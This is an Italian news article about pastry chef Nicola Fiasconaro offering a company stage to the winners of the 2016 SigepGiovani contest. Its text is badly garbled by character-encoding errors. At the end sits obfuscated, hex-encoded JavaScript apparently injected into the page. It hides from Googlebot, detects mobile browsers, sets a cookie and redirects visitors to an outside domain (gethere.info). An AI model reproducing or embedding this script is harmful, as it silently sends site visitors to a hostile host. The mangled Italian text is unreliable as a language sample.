News

Nicola Fiasconaro premia i giovani talenti della pasticceria con uno stage nella sua azienda

Il noto pasticcere siciliano Nicola Fiasconaro premia i talenti della��arte dolciaria italiana: uno stage presso la sede della��azienda a Castelbuono (PA) a tutti i componenti del team vincitore della 25esima edizione del concorso SigepGiovani.

La possibilitA� di seguire uno stage di una settimana presso i propri laboratori: questo il a�?superpremioa�� messo a disposizione dalla��azienda dolciaria siciliana Fiasconaro alla��intero team di giovani pasticceri che si aggiudicherA� il primo posto alla��edizione 2016 del concorso SigepGiovani che da ben 25 anni chiama alla��appello le migliori scuole professionali di cucina di tutta Italia.

La��appuntamento A? fissato negli spazi della Fiera di Rimini per lunedA� 25 gennaio nella��ambito del Forum Pastry&Cultry in programma nel corso di Sigep, il Salone internazionale di gelateria, pasticceria e panificazione artigianali.
Emblematico il tema di questa��anno della competizione: a�?Cioccolatoa�� che passione!a��

Duplice la��obiettivo. Da un lato stimolare la creativitA� dei giovani concorrenti stimolandoli a mettere in pratica quanto appreso in aula e dalla��altro incoraggiare fra di essi un interscambio di conoscenze.

I rappresentanti delle 12 scuole ammesse, per un totale di 48 studenti, si daranno battaglia, fra forni e fornelli, lungo tutta la giornata per realizzare squisiti mignon, un dolce da passeggio e una pralina. Tutti, rigorosamente, a base di fine cioccolato.

Ai componenti della Giuria Tecnica la��arduo compito di individuare la squadra migliore i cui componenti, oltre ai meritati trofei, si aggiudicheranno utili manuali professionali, attrezzature tecniche da utilizzare in comune e, appunto la possibilitA� di frequentare lo stage, comprensivo di vitto e alloggio, presso la��azienda Fiasconaro che, con sede a Castelbuono (antico borgo medioevale nel cuore delle Madonie, a poca distanza da Palermo), costituisce oggi un punto di riferimento assoluto nel settore della��alta pasticceria.

a�?A? un piacere, lo dico col cuore, offrire la possibilitA� di vivere un momento di formazione alla��interno della nostra realtA� a giovani meritevoli che stanno studiando le tecniche di base della bianca arte della pasticceria. Anche io, poco piA? che ragazzo, ho frequentato stage presso laboratori e aziende dolciarie lontane dalla mia Sicilia. Ho studiato e metabolizzato ogni insegnamento. E poi, aggiungendo del mio, ho cercato di mettere in pratica quanto appreso.a�? afferma il pluripremiato pasticcere Nicola Fiasconaro.

L’azienda dolciaria siciliana Fiasconaro si posiziona oggi come un punto di riferimento assoluto nel settore della��alta pasticceria. Affermata sul mercato nazionale e internazionale, A? una realtA� moderna e in continua espansione in cui convivono un forte spirito imprenditoriale e una costante ricerca della qualitA� nel pieno rispetto dei piA? alti standard della tradizione gastronomica italiana. Oggi i prodotti Fiasconaro, dopo aver valicato i confini siciliani, sono distribuiti su tutto il territorio nazionale, in molti Paesi europei (Austria, Belgio, Cipro, Repubblica Ceca, Finlandia, Francia, Germania, Grecia, Ungheria, Lituania, Lussemburgo, Malta, Paesi Bassi, Polonia, Romania, Slovacchia, Spagna, Svezia, Svizzera, Regno Unito) oltre che negli USA, in Canada, in Brasile, in Giappone, in Australia e in Nuova Zelanda.

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}